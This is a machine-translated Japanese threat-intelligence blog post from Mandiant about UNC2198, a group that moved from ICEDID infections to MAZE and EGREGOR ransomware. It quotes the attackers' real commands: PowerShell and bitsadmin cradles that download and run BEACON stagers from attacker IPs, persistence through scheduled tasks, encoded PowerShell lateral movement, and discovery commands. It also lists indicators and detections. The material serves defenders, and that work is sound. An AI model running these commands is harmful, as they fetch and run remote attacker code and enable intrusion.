ブログ(脅威調査)

So Unchill - UNC2198 ICEDIDのランサムウェア・オペレーションへの融解

Mandiant Advanced Practices (AP)は、ランサムウェアを使用して組織を深刻に破壊する、資金的に動機付けされたグループの移行戦略、技術、および手順(TTP)を厳密に追跡します。2020年5月、FireEyeは、MAZEの展開に関連する侵入末尾の欠落を詳述するブログの記事をリリースしました。この投稿の公開時点で、MAZEランサムウェアを展開した11の異なるグループを追跡していました。2020年の終わりに、ICEDID感染から取得したアクセスに続くMAZEランサムウェアのためにEGREGORランサムウェアを配備し始めたこれらのグループのサブセットの変化に気づきました。

2017年にバンキング型トロイの木馬として発見されてから、ICEDIDは、金銭的に動機づけられた活動者が侵入操作を行うための悪質なエントリー・ポイントに進化しました。以前は、ICEDIDは主にバンキング・クレデンシャルをターゲットにしていました。2020年、私たちは、影響を受けるネットワークへのアクセスを可能にするツールとしてICEDIDをより明示的に使用する敵を観測し、多くの場合は一般的な悪用後、フレームワークを使用し、最終的にランサムウェアの展開につながるようになりました。このブログは、MAZEまたはEGREGORランサムウェアの配備にICEDID感染を使用したUNC2198の最新手法について注目します。

Iglooの構築: ICEDID感染

アクセスの取得などの離散操作が連続操作の一部でない場合、侵入の個々のフェーズは、異なる非分類(UNC)グループに帰属します。純粋な「アクセス操作」は、別のグループによって実行される操作に従うために、ターゲット環境へのリモート・アクセスを確立します。別のグループの初期の足場確立のためにデプロイされたバックドアが、アクセス操作の一例です。

2020年7月から12月の間、ICEDIDフィッシング感染チェーンは、MOUSEISLANDとPHOTOLOADERを含む多段階プロセスで構成されました(図1) 。


図1:UNC2420 MOUSEISLANDからICEDIDへの感染チェーンの例

MOUSEISLANDは、最初の感染段階として使用されるMicrosoft Wordマクロ・ダウンローダーで、フィッシングEメールに添付され、パスワード保護されたzip内に配信されます(図2)。ICEDID関連インシデントへの応答からの侵入データに基づいて、MOUSEISLANDが配信するセカンダリ・ペイロードは、ICEDIDをインストールするための中間ダウンロード者として機能するPHOTOLOADERです。Mandiantは、PHOTOLOADERなどのペイロードのMOUSEISLAND分布を、MandiantのThreat Pursuitチームによって作成された分布脅威クラスタUNC2420にアトリビュートします。UNC2420活動共有は「Shathak」または「TA551」の公表されている命名法と重複しています。


図2: UNC2420MOUSEISLANDフィッシングEメール

Ice, Ice, BEACON...UNC2198

分析は常に進行中ですが、このブログの記事の発行時点で、Mandiantは、侵入オペレーションを可能にする足場としてICEDIDを使用した、さまざまな規模の複数の異なる脅威クラスタ(UNCグループ)を追跡しています。これらの脅威クラスタの中で最も目立つのは、幅広い業界にわたって北米の組織をターゲットにしているUNC2198です。少なくとも5つのケースにおいて、UNC2198は、侵入操作を行うためにUNC2420 MOUSEISLANDから初期アクセスを獲得しました。2020年、MandiantはUNC2198への9つの個別の侵入に帰属しました。UNC2198の目的は、被害者のネットワークをランサムウェアで侵害することによって、その侵入を収益化することです。2020年7月、Mandiantは、ICEDIDが感染によって提供されるネットワーク・アクセスを利用して、MAZEランサムウェアで環境を暗号化することを観察しました。10月と11月に進むにつれて、別のインシデントレスポンス・エンゲージメントの間に、UNC2198がMAZEの配備からEGREGORランサムウェアの使用に移行したことを観察しました。MAZEと同様に、EGREGORはアフィリエイト・モデルを使用して運用されます。このモデルでは、EGREGORを展開するアフィリエイトは、成功した暗号化と支払いのための拡張をフォローして提供されます。

UNC2198クラスタは6カ月以上にわたって拡大しました。Mandiantの2020年12月のブログ投稿では、活動クラスタの統合と段階的クラスタ化に使用する分析上のノウハウについて述べました。UNCの統合は、あるグループに起因する指標と取引を別のグループに照らし合わせて検討する、実質的な分析手法です。同様の手口を共有していた2つの以前のUNCは、最終的にUNC2198に統合されました。

属性のSnowballエフェクト

APは2020年6月にICEDID、BEACON、SYSTEMBC、WINDARCを含む単一の侵入に基づいてUNC2198を作成しました。UNC2198はこのインシデント中に26時間で32システムを侵害しましたが、ランサムウェアは導入されませんでした。しかし、2020年7月を通して、MAZEランサムウェアの展開につながるものも含めて、インシデントレスポンス・エンゲージメントからUNC2198への侵入が3件ありました。2020年10月には、インシデントレスポンス・エンゲージメントとManaged Defenseのお客様の両方で一連の活動が行われ、2つの新しいUNCグループが作成されました。残り1つのインシデントはUNC2198に帰属しました。

2020年10月に作成された新しいUNCグループの1つを、UNC2374と名付けました。UNC2374は、Managed Defenseのお客様のインシデント中にBEACON、WINDARC、SYSTEMBCが観測され、独自のクラスタとして始まりました。ツールの最初の類似性は、UNC2374とUNC2198を統合するにはまだ不十分な構成でした。

UNC2374の作成から2か月半後、UNC2374をUNC2198に統合するのに十分なデータ・ポイントを蓄積しました。UNC2374をUNC2198に統合する際に使用したデータ・ポイントには、次のものがあります。

  • UNC2198およびUNC2374Cobalt Strike Team Serverが、TCPポート25055で次のサブジェクトを持つ自己署名証明書を使用

C = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com

  • UNC2198およびUNC2374が同じファイル・パスにWINDARCマルウェアをデプロイ: %APPDATA%\teamviewers\msi.dll
  • UNC2198BEACONローダーに署名するために使用されたものと同じコード署名証明書が、2つのUNC2374SYSTEMBCトンネラーペイロードに署名に使用される
  • UNC2374およびUNC2198BEACON C2サーバーが、侵入操作中に10分間の時間枠内で同じ被害者システムによってアクセスされる

2020年10月に作成された他のUNCグループは、UNC2414と名付けられました。3つの別々の侵入がUNC2414に起因し、クラスタが成長するにつれて、私たちはUNC2414とUNC2198の間の類似性に直面しました。UNC2414をUNC2198に統合するために使用されるデータ・ポイントのサブセットは以下の通りです。

  • UNC2198およびUNC2414BEACONサーバーが、TCPポート25055で次のサブジェクトを使用して自己署名証明書を使用

C = US, ST = CA, L = California, O = Oracle Inc, OU = Virtual Services, CN = oracle.com

  • UNC2198およびUNC2414がBEACONをC:\Windows\int32.dllとしてインストール
  • UNC2198とUNC2414はRCLONEユーティリティをC:\Perflogs\rclone.exeとしてインストール
  • UNC2198とUNC2414が、ICEDIDを初期アクセスとして活用した資金的に動機づけのある活動者であることが証明された
    • UNC2198がMAZEを配備
    • UNC2414がEGREGORを配備

UNC2198とUNC2414の統合は、UNC2198がEGREGORランサムウェアにアクセスできることを明らかにしたため、重要でした。EGREGORの使用タイミングは、Mandiant Intelligenceから報告されたMAZEランサムウェアのシャットダウンと一貫性があります。図3は、関連する侵入とUNC2198への統合のタイムラインを示しています。


図3:UNC2198タイムライン

UNC2198侵入フロー: 初期アクセス後

複数の侵入や他のUNCグループとの統合によってUNC2198クラスタを拡大することで、採用されたTTPの範囲をハイライトします。攻撃者グループが使用する機能の統合を説明するために、すべてのUNC2198侵入からいくつかのキー・データを引き出しました。

足場の確立

アクセスを得た後、UNC2198は様々な技術を用いて追加のマルウェアを配備しました。たとえば、UNC2198はInnoSetupドロッパーを使用して、ターゲット・ホストにWINDARCバックドアをインストールしました。UNC2198では、BITSジョブとリモートPower Shellダウンロードを使用して、プロキシやトンネラーの機能にSYSTEMBCなどの追加ツールをダウンロードしました。ダウンロードと実行のコマンド例は次のとおりです。

%COMSPEC% /C echo bitsadmin /transfer 257e http://<REDACTED>/<REDACTED>.exe %APPDATA%<REDACTED>.exe & %APPDATA%<REDACTED>.exe & del %APPDATA% <REDACTED>.exe ^> %SYSTEMDRIVE%\WINDOWS\Temp\FmpaXUHFennWxPIM.txt > \WINDOWS\Temp\MwUgqKjEDjCMDGmC.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\MwUgqKjEDjCMDGmC.bat

%COMSPEC% /C echo powershell.exe -nop -w hidden -c (new-object System.Net.WebClient).Downloadfile(http://<REDACTED>/<REDACTED>.exe, <REDACTED>.exe) ^> %SYSTEMDRIVE%\WINDOWS\Temp\AVaNbBXzKyxktAZI.txt > \WINDOWS\Temp\yoKjaqTIzJhdDLjD.bat & %COMSPEC% /C start %COMSPEC% /C \WINDOWS\Temp\yoKjaqTIzJhdDLjD.bat

UNC2198は、このフェーズ中にもCobalt Strike BEACON、Metasploit METERPRETER、KOADIC、およびPower Shell EMPIRE攻撃セキュリティ・ツールを使用しました。

攻撃的なセキュリティ・ツール

UNC2198は、多くの攻撃者グループで同様の攻撃的なセキュリティ・ツールを使用しています。UNC2198は、約90%の侵入でBEACONを使用しています。UNC2198は、Power Shellスクリプト、サービス実行可能ファイル、DLLを使用したシェルコード・ローダーなど、さまざまな方法でCobalt Strike BEACONをインストールして実行します。BEACONの使用方法と手段は本質的に一意ではありませんが、UNC2198TTPでは注目すべき側面がまだあります。

特定のBEACON実行形式に焦点を当てることは、ツール自体の利用以外に別のストーリーを教えてくれます。ジャンクコードやAPIコールとは別に、UNC2198BEACONおよびMETERPRETER実行可能ファイルは、多くの場合、文字列内および子プロセスを介した実行時に表示される奇数のコマンドライン引数を含む、マルウェア・パッケージングの固有の特性を示します:

cmd.exe /c echo TjsfoRdwOe=9931 & reg add HKCU\SOFTWARE\WIlumYjNSyHob /v xFCbJrNfgBNqRy /t REG_DWORD /d 3045 & exit

cmd.exe /c echo ucQhymDRSRvq=1236 & reg add HKCU\\SOFTWARE\\YkUJvbgwtylk /v KYIaIoYxqwO /t REG_DWORD /d 9633 & exit

cmd.exe /c set XlOLqhCejHbSNW=8300 & reg add HKCU\SOFTWARE\WaMgGneKhtgTTy /v LbmWADsevLywrkP /t REG_DWORD /d 3809 & exit

これらのコマンド例は、ペイロードの実行を変更または変更しないため、機能しません。

別の手法として、検知を回避するためにUnicodeエスケープ文字とASCII文字が混在したファイル・パスを使ってBEACONをインストールする手法もあります。

Unicode Escaped

C:\ProgramData\S\u0443sH\u0435\u0430ls\T\u0430s\u0441host.exe

Unicode Unescaped

C:\ProgramData\SуsHеаls\Tаsсhost.exe

その後、実行可能ファイルは、shadowdevという名前のスケジュールされたタスクを使用して実行されました:

cmd.exe /c schtasks /create /sc minute /mo 1 /tn shadowdev /tr C:\\ProgramData\\S\u0443sH\u0435\u0430ls\\T\u0430s\u0441host.exe

前述の例は、コンパイル済み実行可能ファイルに関連していますが、UNC2198では、単純なPoewer Shellダウンロード・クレードルを使用して、Base64でエンコードされた圧縮されたBEACON・ステージャーをメモリ内で実行しています。

powershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://5.149.253[.]199:80/auth'))

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring("hxxp://185.106.122[.]167:80/a"))

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://195.123.233[.]157:80/casino'))"

検出と偵察

UNC2198は、発見と探査活動の間に多くの脅威グループにわたって見られる一般的なTTPを示しました。UNC2198は、"C:\ProgramData"および"C:\Temp"ディレクトリ内からの侵入中に、BloodHoundアクティブ・ディレクトリ・マッピング・ユーティリティを使用しました。

以下は、UNC2198が侵害された環境を列挙するために時間の経過とともに実行するさまざまなコマンドの集合的な例です。

arp -a
whoami /groups
whoami.exe  /groups /fo csv
whoami /all

net user <Redacted>
net groups "Domain Admins" /domain
net group "Enterprise admins" /domain
net group "local admins" /domain
net localgroup "administrators" /domain

nltest /domain_trusts
nltest /dclist:<Redacted>

水平展開と権限の昇格

UNC2198では、Windows Remote ManagementとRDPを使用してシステム間を水平方向に移動しています。UNC2198はまた、ターゲット・システム上でBEACON・サービス・バイナリの遠隔実行を実施し、水平方向に移動しました。UNC2198は、Poewer Shellを使用してSMB BEACONを起動し、次のようなコマンドラインを実行します。

C:\WINDOWS\system32\cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAB
bAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AH
MASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADIALw...<Truncated>

1回の侵入中に、UNC2198はSOURBITS権限昇格ユーティリティを使用して、ターゲット・システムでファイルを実行しました。SOURBITSはCVE-2020-0787用のパッケージされたエクスプロイトユーティリティで、これは2020年にWindows Background Intelligent Transfer Service(BITS)用に公開された脆弱性です。SOURBITSは、コマンドライン・ユーティリティとして実装されたGitHubリポジトリから派生したコードで構成されます。このユーティリティは、高度な権限を持つ任意のファイルを実行できます。UNC2198は、次のコンポーネントでSOURBITSを使用しました。

C:\Users\<User>\Downloads\runsysO.cr
C:\Users\<User>\Downloads\starterO.exe

runsysO.crファイルは、CVE-2020-0787を悪用するXORエンコードされたPE実行可能ファイルで、ターゲットシステムのビット数に基づいて、2つの埋め込みSOURBITSペイロードのいずれかをドロップします。

データ窃取、ランサムウェア展開、#TTR

他の資金的に動機づけされた攻撃グループと同様に、UNC2198の侵入の後半段階における手口の一部には、ランサムウェアがインストールされるまでに被害者組織の数百GBのデータが枯渇するというものがあります。具体的には、UNC2198は、クラウド・ストレージの同期に使用されるコマンド・ライン・ユーティリティであるRCLONEを使用して、機密データの除外に役立てています。観測されたデータ窃取のすべてのケースで、RCLONEは"C:\PerfLogs\rclone.exe"ファイル・パスからUNC2198によって使用されました。

"Time-to-Ransom"(TTR)は、初期属性のaccess時間とランサムウェア展開時間の差分です。TTRは、攻撃者グループがランサムウェアを正常に展開したときに、組織がどのくらいの速さでゲージに応答する必要があるかを示す便利な基準として機能します。TTRは完全な定量化ではありません。組織のセキュリティ体制などの外部要因が測定に大きく影響する可能性があるためです。

この投稿では、ランサムウェアの展開に対するICEDID活動間でUNC2198のTTRが測定されます。2020年7月、UNC2198はPSEXECを用いてMAZEランサムウェアを展開し、TTRは5.5日でした。2020年10月、UNC2198は強制GPO更新を用いてEGREGORランサムウェアを展開し、TTRは1.5日でした。

展望

大規模マルウェア・キャンペーンで得られたアクセスを利用してランサムウェアを展開する攻撃者グループは、増加傾向にあります。ランサムウェア・グループの効率が上がることは、ランサムウェア展開前に防御者が迅速に対応することに大きな負担となります。ランサムウェア・グループは、妥協的成功を通じて運用上の専門知識を獲得し続けるため、運用をスケーリングしながらTTRを短縮し続けます。UNC2198のような特定の運用の基本となるTTPを理解することは、レスポンスの取り組みにおいて防御者に優位性をもたらします。UNC2198のようなグループについての当社の比類のない知見は、Mandiant Advantageに置き換えられました。Mandiant Advantageにアクセスしていただくことで、攻撃者グループが使用するTTPの認識、組織のリスクの評価、および対策の実施を支援します。グループの手口を迅速に判断するために行われる初期投資は、必然的にツールセットのコンポーネントを進化させ、スワップ・アウトするときに支払います。MAZEであれEGREGORであれ、新規のものであれ長く活動しているものであれ、Advanced Practicesは、どのような困難な攻撃者グループも追求し続けます。

謝辞

Dan Perez氏、Andrew Thompson氏、Nick Richard氏、Cian Lynch氏、Jeremy Kennelly氏には、本コンテンツの技術的なレビューをいただき、感謝しています。加えて、私たちの調査を可能にする貴重な侵入データを収集してくれた、Mandiantの最前線にいる対応者にも感謝します。

付録:マルウェア・ファミリー

PHOTOLOADERは、ICEDIDのダウンロードが監視されているダウンローダーです。これは、偽のイメージ・ファイルのHTTP要求を行います。これは、最終的なペイロードを提供するためにRC4で復号化されます。ホスト情報は、HTTP Cookieを介してコマンド及び制御(C2) に送信されます。サンプルには、多数の悪意のないドメインを持つ実際の埋め込みC2構成が含まれていることが確認されています。悪意のないドメインは、実際のC2に加えて接続されます。

WINDARCは、C2コミュニケーションを実行するためにTeamViewerの実行をハイジャックするバックドアです。プラグインをサポートしており、いくつかのバックドアの指揮命令を受け付けています。コマンドには、TeamViewerツールの操作、リバース・シェルの起動、新しいプラグインのロード、ファイルのダウンロードと実行、構成設定の変更などがあります。

SYSTEMBCは、C2にBEACONしてC2とリモート・ホスト間の新しいプロキシ接続を開くプロキシ・マルウェアで、C2で示されています。プロキシ・コミュニケーションはRC4で暗号化されます。マルウェアはHTTP経由でコマンドを受信し、指示に従って新しいプロキシ接続を作成します。地下販売広告は、ソフトウェアを「socks5 backconnect system」と呼びます。マルウェアは通常、他のマルウェアに関連付けられた悪意のあるトラフィックを非表示にするために使用されます。

付録:技術の検出

FireEyeセキュリティー・ソリューションは、Eメール、エンドポイント、およびネットワーク・レベル全体でこれらの脅威を検知します。以下は、このブログ投稿で概説されている活動に関連する現存の検知のスナップショットです。

Platform

Detection Name

FireEye Network Security

  • Downloader.Macro.MOUSEISLAND  
  • Downloader.Win.PHOTOLOADER     
  • Trojan.PHOTOLOADER          
  • Downloader.IcedID
  • Trojan.IcedID             
  • Malicious.SSL.IcedID
  • Malicious.SSL.IcedIdCert
  • Trojan.Malicious.Certificate
  • Backdoor.BEACON
  • Trojan.Generic
  • Trojan.CobaltStrike

FireEye Endpoint Security

Real-Time (IOC)

  • BLOODHOUND ATTACK PATH MAPPING (UTILITY)
  • BLOODHOUND ATTACK PATH MAPPING A (UTILITY)
  • COBALT STRIKE (BACKDOOR)
  • COBALT STRIKE DEFAULT DLL EXPORT (BACKDOOR)
  • COBALT STRIKE NAMED PIPE ECHO (BACKDOOR)
  • EGREGOR RANSOMWARE (FAMILY)
  • ICEDID (FAMILY)
  • MAZE RANSOMWARE (FAMILY)
  • MAZE RANSOMWARE A (FAMILY)
  • METASPLOIT SERVICE ABUSE (UTILITY)
  • MOUSEISLAND (DOWNLOADER)
  • MOUSEISLAND A (DOWNLOADER)
  • MOUSEISLAND B (DOWNLOADER)
  • POWERSHELL DOWNLOADER (METHODOLOGY)
  • POWERSHELL DOWNLOADER D (METHODOLOGY)
  • SCHTASK CREATION FROM PROGRAMDATA (COLLECTION)
  • SUSPICIOUS BITSADMIN USAGE A (METHODOLOGY)
  • SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
  • WMIC SHADOWCOPY DELETE (METHODOLOGY)

Malware Protection (AV/MG)

  • SYSTEMBC
  • Trojan.EmotetU.Gen.*
  • Trojan.Mint.Zamg.O
  • Generic.mg.*
  • ICEID
  • Gen:Variant.Razy.*
  • Generic.mg.*
  • BEACON
  • Gen:[email protected]
  • Gen:Variant.Bulz.1217
  • Trojan.GenericKD.34797730
  • Generic.mg.*

Appendix: Indicators

95b78f4d3602aeea4f7a33c9f1b49a97

SYSTEMBC

0378897e4ec1d1ee4637cff110635141

SYSTEMBC

c803200ad4b9f91659e58f0617f0dafa

SYSTEMBC

ad4d445091a3b66af765a1d653fd1eb7

SYSTEMBC

9ecf25b1e9be0b20822fe25269fa5d02

SYSTEMBC

e319f5a8fe496c0c8247e27c3469b20d

SYSTEMBC

a8a7059278d82ce55949168fcd1ddde4

SYSTEMBC

aea530f8a0645419ce0abe1bf2dc1584

SYSTEMBC

3098fbc98e90d91805717d7a4f946c27

SYSTEMBC

45.141.84.212:4132

SYSTEMBC

45.141.84.223:4132

SYSTEMBC

79.141.166.158:4124

SYSTEMBC

149.28.201.253:4114

SYSTEMBC

193.34.167.34:80 

BEACON

195.123.240.219:80

BEACON

23.227.193.167:80

BEACON

5.149.253.199:80 

BEACON

e124cd26fcce258addc85d7f010655ea

BEACON

7ae990c12bf5228b6d1b90d40ad0a79f

BEACON

3eb552ede658ee77ee4631d35eac6b43

BEACON

c188c6145202b65a941c41e7ff2c9afd

BEACON

2f43055df845742d137a18b347f335a5

BEACON

87dc37e0edb39c077c4d4d8f1451402c

ICEDID

1efababd1d6bd869f005f92799113f42

ICEDID

a64e7dd557e7eab3513c9a5f31003e68

ICEDID

9760913fb7948f2983831d71a533a650

ICEDID

14467102f8aa0a0d95d0f3c0ce5f0b59

ICEDID

colombosuede.club

ICEDID

colosssueded.top

ICEDID

golddisco.top

ICEDID

june85.cyou

ICEDID

付録:Mandiant Security Validationのアクション

組織は、Mandiant Security Validationによる60を超える活動に対して、自らのセキュリティ管理対策を検証することができます。

VID

Name

A101-509

Phishing Email - Malicious Attachment, MOUSEISLAND, Macro Based Downloader

A150-326

Malicious File Transfer - MOUSEISLAND, Download, Variant #1

A150-433

Malicious File Transfer - MOUSEISLAND, Download, Variant #2

A101-282

Malicious File Transfer - MOUSEISLAND Downloader, Download

A104-632

Protected Theater - MOUSEISLAND Downloader, Execution

A101-266

Command and Control - MOUSEISLAND, HTTP GET Request for PHOTOLOADER

A101-280

Malicious File Transfer - PHOTOLOADER, Download

A101-263

Command and Control - PHOTOLOADER, DNS Query #1

A101-281

Malicious File Transfer - ICEDID Stage 3, Download

A101-279

Malicious File Transfer - ICEDID Final Payload, Download

A101-265

Command and Control - ICEDID, DNS Query #1

A101-264

Command and Control - ICEDID, DNS Query #2

A101-037

Malicious File Transfer - MAZE, Download, Variant #1

A101-038

Malicious File Transfer - MAZE, Download, Variant #2

A101-039

Malicious File Transfer - MAZE, Download, Variant #3

A101-040

Malicious File Transfer - MAZE, Download, Variant #4

A101-041

Malicious File Transfer - MAZE, Download, Variant #5

A101-042

Malicious File Transfer - MAZE, Download, Variant #6

A101-043

Malicious File Transfer - MAZE, Download, Variant #7

A101-044

Malicious File Transfer - MAZE, Download, Variant #8

A101-045

Malicious File Transfer - MAZE, Download, Variant #9

A100-878

Command and Control - MAZE Ransomware, C2 Check-in

A101-030

Command and Control - MAZE Ransomware, C2 Beacon, Variant #1

A101-031

Command and Control - MAZE Ransomware, C2 Beacon, Variant #2

A101-032

Command and Control - MAZE Ransomware, C2 Beacon, Variant #3

A104-734

Protected Theater - MAZE, PsExec Execution

A104-487

Protected Theater - MAZE Ransomware, Encoded PowerShell Execution

A104-485

Protected Theater - MAZE Ransomware Execution, Variant #1

A104-486

Protected Theater - MAZE Ransomware Execution, Variant #2

A104-491

Host CLI - MAZE, Create Target.lnk

A104-494

Host CLI - MAZE, Dropping Ransomware Note Burn Directory

A104-495

Host CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant

A104-496

Host CLI - MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant

A104-498

Host CLI - MAZE, Desktop Wallpaper Ransomware Message

A150-668

Malicious File Transfer - EGREGOR, Download

A101-460

Command and Control - EGREGOR, GET DLL Payload

A150-675

Protected Theater - EGREGOR, Execution, Variant #1

A101-271

Malicious File Transfer - BEACON, Download, Variant #1

A150-610

Malicious File Transfer - BEACON, Download

A150-609

Command and Control - BEACON, Check-in

A104-732

Protected Theater - BEACON, Mixed Unicode-Escaped and ASCII Characters Execution

A101-514

Malicious File Transfer - WINDARC, Download, Variant #1

A100-072

Malicious File Transfer - SYSTEMBC Proxy, Download

A100-886

Malicious File Transfer - Rclone.exe, Download

A100-880

Malicious File Transfer - Bloodhound Ingestor C Sharp Executable Variant, Download

A100-881

Malicious File Transfer - Bloodhound Ingestor C Sharp PowerShell Variant, Download

A100-882

Malicious File Transfer - Bloodhound Ingestor PowerShell Variant, Download

A100-877

Active Directory - BloodHound, CollectionMethod All

A101-513

Malicious File Transfer - SOURBITS, Download, Variant #1

A104-733

Protected Theater - CVE-2020-0787, Arbitrary File Move

A100-353

Command and Control - KOADIC Agent (mshta)

A100-355

Command and Control - Multiband Communication using KOADIC

A104-088

Host CLI - Timestomp W/ PowerShell

A104-277

Host CLI - EICAR COM File Download via PowerShell

A104-281

Host CLI - EICAR TXT File Download via PowerShell

A104-664

Host CLI - EICAR, Download with PowerShell

A150-054

Malicious File Transfer - EMPIRE, Download

A100-327

Command and Control - PowerShell Empire Agent (http)

A100-328

Lateral Movement, Execution - PsExec

A100-498

Scanning Activity - TCP Port Scan for Open RDP

A100-502

Scanning Activity - UDP Port Scan for Open RDP

A100-316

Lateral Movement - PSSession and WinRM

A104-081

Host CLI - Mshta

付録:UNC2198MITRE ATT&CKマッピング

ATT&CK Tactic Category

Techniques

Resource Development

Acquire Infrastructure (T1583)

  • Virtual Private Server (T1583.003)

Develop Capabilities (T1587)

  • Digital Certificates (T1587.003)

Obtain Capabilities (T1588)

  • Code Signing Certificates (T1588.003)
  • Digital Certificates (T1588.004)

Initial Access

Phishing (T1566)

  • Spearphishing Attachment (T1566.001)

External Remote Services (T1133)

Valid Accounts (T1078)

Execution

Command and Scripting Interpreter (T1059)

  • PowerShell (T1059.001)
  • Visual Basic (T1059.005)
  • Windows Command Shell (T1059.003)

Scheduled Task/Job (T1053)

  • Scheduled Task (T1053.005)

System Services (T1569)

  • Service Execution (T1569.002)

User Execution (T1204)

  • Malicious File (T1204.002)

Windows Management Instrumentation (T1047)

Persistence

External Remote Services (T1133)

Scheduled Task/Job (T1053)

  • Scheduled Task (T1053.005)

Valid Accounts (T1078)

Privilege Escalation

Process Injection (T1055)

Scheduled Task/Job (T1053)

  • Scheduled Task (T1053.005)

Valid Accounts (T1078)

Defense Evasion

Impair Defenses (T1562)

  • Disable or Modify System Firewall (T1562.004)
  • Disable or Modify Tools (T1562.001)

Indicator Removal on Host (T1070)

  • Timestomp (T1070.006)

Indirect Command Execution (T1202)

Modify Registry (T1112)

Obfuscated Files or Information (T1027)

  • Steganography (T1027.003)

Process Injection (T1055)

Signed Binary Proxy Execution (T1218)

  • Mshta (T1218.005)

Subvert Trust Controls (T1553)

  • Code Signing (T1553.002)

Valid Accounts (T1078)

Virtualization/Sandbox Evasion (T1497)

Credential Access

OS Credential Dumping (T1003)

Discovery

Account Discovery (T1087)

  • Local Account (T1087.001)

Domain Trust Discovery (T1482)

File and Directory Discovery (T1083)

Permission Groups Discovery (T1069)

System Information Discovery (T1082)

System Network Configuration Discovery (T1016)

System Owner/User Discovery (T1033)

Virtualization/Sandbox Evasion (T1497)

Lateral Movement

Remote Services (T1021)

  • Remote Desktop Protocol (T1021.001)
  • SMB/Windows Admin Shares (T1021.002)
  • SSH (T1021.004)

Collection

Archive Collected Data (T1560)

  • Archive via Utility (T1560.001)

Command and Control

Application Layer Protocol (T1071)

  • Web Protocols (T1071.001)

Encrypted Channel (T1573)

  • Asymmetric Cryptography (T1573.002)

Ingress Tool Transfer (T1105)

Proxy (T1090)

  • Multi-hop Proxy (T1090.003)

 

本ブログは機械翻訳(MT)を使用して翻訳しています。原文と翻訳版の意味、文言が異なる場合は原文を有効とします。

原文:February 25, 2021 「So Unchill: Melting UNC2198 ICEDID to Ransomware Operations